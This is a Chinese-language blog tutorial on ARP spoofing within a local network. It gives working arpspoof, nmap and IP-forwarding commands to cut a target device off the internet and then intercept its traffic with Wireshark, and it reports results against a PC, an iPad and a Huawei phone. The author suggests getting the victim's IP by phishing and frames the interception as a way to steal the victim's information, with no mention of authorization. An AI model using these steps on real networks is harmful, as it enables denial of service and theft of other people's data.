ARP网络欺骗——手机/平板/电脑欺骗测试

ARP欺骗

ARP欺骗只适用于内网(局域网)

此处暂时不讲原理,只说使用方法。

环境

kali系统(环境全有了)

arpspoof工具
wireshark工具

ubuntu系统

先安装arpspoof工具

    sudo apt-get install dsniff 

安装完后可输入下面命令 查看是否安装成功

    arpspoof --help 

若显示页面有相关功能介绍则安装成功

若显示不是这样可以尝试换到root权限,若还不行则重新安装

wireshark (这里的wireshark也需要安装)

上面两个环境 均可在windows上进行 虚拟机

所需条件

自身IP

自身IP,windows系统通过cmd ipconfig指令查看;linux系统输入ifconfig查看

下图的红圈即自身IP

ARP网络欺骗——手机/平板/电脑欺骗测试_第1张图片

对方IP

对方IP需要自己找办法获取,可以通过钓鱼等等获取。若IP数量较小也可以通过查看局域网内所有IP来判别,下面为具体操作。

namp -sP 192.168.31.0/24 #注意192.168.31.0需要改为你的网关IP

ARP网络欺骗——手机/平板/电脑欺骗测试_第2张图片

也可以用fping或者自己写个脚本,原理就算ping内网的地址 ping得通的就是存活的

网关地址

网关地址和自身IP获取一样,下图红圈就算网关IP

ARP网络欺骗——手机/平板/电脑欺骗测试_第3张图片

断网攻击

断网攻击指的是断开局域网内任意IP与外网的连接。

在获取到上面的信息后就可以开始攻击了,在linux系统中输入下面指令:

#基本语法
arpspoof -i 网卡 -t 目标IP 网关IP

#例子 若是连接网线的一般为eth0 其名称也可以在查本机IP时找到
arpspoof -i etho0 -t 192.168.31.149 192.168.31.1

ARP网络欺骗——手机/平板/电脑欺骗测试_第4张图片

在测试对电脑的断网是成功的。对于ipad也是成功的,但是对于华为手机效果不太好前期有点阻碍效果但是后面效果消失了,可能华为手机有一定的防御策略。

不过需要注意的是有时候你的网关IP未必是另外一台设备的网关 不过一般靠近点的都会是同一网关Ip

中间人攻击

除了可以断网后,还可以通过此项攻击来盗取受害者的信息,如下为具体操作

先开启kali(这里只讲kali的)的转发功能
echo 1 > /proc/sys/net/ipv4/ip_forward 
#默认是0 的 若变成1 则表示开启

在这里插入图片描述

开启了上述功能后,目标机器就不会断网的。其差不多就算目标机器通过你的机器来访问网络 然后你就可以访问它发出的信息

下一步和断网攻击一样 进行攻击
#基本语法
arpspoof -i 网卡 -t 目标IP 网关IP

#例子 若是连接网线的一般为eth0 其名称也可以在查本机IP时找到
arpspoof -i etho0 -t 192.168.31.149 192.168.31.1
然后打开wireshark抓包

结果发现对ipad抓包失败,但是对windows抓包成功

ARP网络欺骗——手机/平板/电脑欺骗测试_第5张图片

ARP网络欺骗——手机/平板/电脑欺骗测试_第6张图片

在这里插入图片描述

在这里插入图片描述

再对华为手机进行测试 结果还是无法抓到包

你可能感兴趣的:(渗透测试,安全,web安全,网络协议)